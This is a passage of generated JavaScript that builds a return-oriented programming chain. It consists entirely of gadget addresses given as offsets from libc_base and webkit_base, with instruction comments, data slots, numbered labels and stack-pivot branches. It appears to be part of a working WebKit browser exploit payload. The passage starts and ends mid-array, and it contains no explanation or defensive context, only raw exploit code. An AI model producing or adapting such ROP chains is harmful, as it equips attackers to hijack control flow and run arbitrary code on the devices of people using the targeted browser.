ropchain+250120, //L4577
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4577:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4579:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+250280, //L4582
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+250248, //L4580
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+250264, //L4581
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4580:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4581:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4582:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+250376, //L4584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4583:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4584:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4585:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+250480, //L4586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+250496, //L4587
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4586:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4587:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+250672, //L4589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+250688, //L4590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+250656, //L4588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4588:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4589:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4590:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+250832, //L4593
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+250848, //L4594
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+250800, //L4591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4591:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4592:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4593:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4594:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+250920, //L4595
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4595:
db([0, 0]); // 0x0
//L4567:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+251048, //L4598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+251064, //L4599
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+251032, //L4597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4597:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4598:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4599:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+251176, //L4601
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+251224, //L4604
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+251192, //L4602
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4601:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4602:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4603:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4604:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+251336, //L4605+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+251328, //L4605
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4605:
db([0, 0]); // 0x0
set_gadgets([
ropchain+251352, //L4605+24
ropchain+253376, //L4600
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+251392, //L4606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4606:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4607:
db([88, 0]); // 0x58
set_gadget(libc_base+144605,); //pop rdi
//L4608:
db([88, 0]); // 0x58
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+251584, //L4612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+251552, //L4610
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+251568, //L4611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4609:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4610:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4611:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4612:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+251640, //L4614
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4614:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+251768, //L4616
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+251784, //L4617
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+251752, //L4615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4615:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4616:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4617:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+251880, //L4619
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+251864, //L4618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4618:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4619:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+251960, //L4620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4620:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4622:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+252080, //L4625
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+252064, //L4623
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4623:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4625:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+252224, //L4628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+252192, //L4626
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+252208, //L4627
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4626:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4627:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4628:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+252296, //L4630
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4630:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+252352, //L4631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4631:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+252432, //L4633
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4633:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4635:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+252552, //L4638
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+252536, //L4636
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4636:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4638:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+252696, //L4641
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+252664, //L4639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+252680, //L4640
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4639:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4640:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4641:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+252784, //L4643
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4642:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L4643:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+252840, //L4644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4644:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4646:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+252920, //L4648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4648:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+253024, //L4649
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+253040, //L4650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4649:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4650:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+253128, //L4652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4652:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+253184, //L4653
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4653:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+253256, //L4656
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4656:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+253312, //L4657
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4657:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+258080, //L4659
//L4600:
libc_base+764760, //pop rsi
ropchain+253416, //L4660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4660:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4662:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+253536, //L4665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+253520, //L4663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4663:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4665:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+253712, //L4668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+253728, //L4669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+253680, //L4666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+253696, //L4667
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4666:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4667:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4668:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4669:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+253888, //L4673
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+253856, //L4671
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+253872, //L4672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4670:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4671:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4672:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4673:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+253992, //L4675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+253976, //L4674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4674:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4675:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+254088, //L4677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4676:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4677:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4678:
db([2, 0]); // 0x2
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+254192, //L4679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+254208, //L4680
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4679:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4680:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+254376, //L4682
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+254392, //L4683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+254360, //L4681
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4681:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4682:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4683:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+254552, //L4688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+254568, //L4689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+254504, //L4685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4685:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4686:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4687:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4688:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4689:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+254680, //L4690+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+254672, //L4690
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4690:
db([0, 0]); // 0x0
set_gadgets([
ropchain+254696, //L4690+24
ropchain+255648, //L4684
libc_base+764760, //pop rsi
ropchain+254736, //L4691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4691:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4693:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+254856, //L4696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+254840, //L4694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4694:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4696:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+255000, //L4699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+254968, //L4697
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+254984, //L4698
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4697:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4698:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4699:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+255096, //L4701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4700:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4701:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4702:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+255200, //L4703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+255216, //L4704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4703:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4704:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+255392, //L4706
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+255408, //L4707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+255376, //L4705
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4705:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4706:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4707:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+255552, //L4710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+255568, //L4711
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+255520, //L4708
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4708:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4709:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4710:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4711:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+255640, //L4712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4712:
db([0, 0]); // 0x0
//L4684:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+255768, //L4715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+255784, //L4716
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+255752, //L4714
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4714:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4715:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4716:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+255896, //L4718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+255944, //L4721
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+255912, //L4719
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4718:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4719:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4720:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4721:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+256056, //L4722+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+256048, //L4722
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4722:
db([0, 0]); // 0x0
set_gadgets([
ropchain+256072, //L4722+24
ropchain+258080, //L4717
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+256112, //L4723
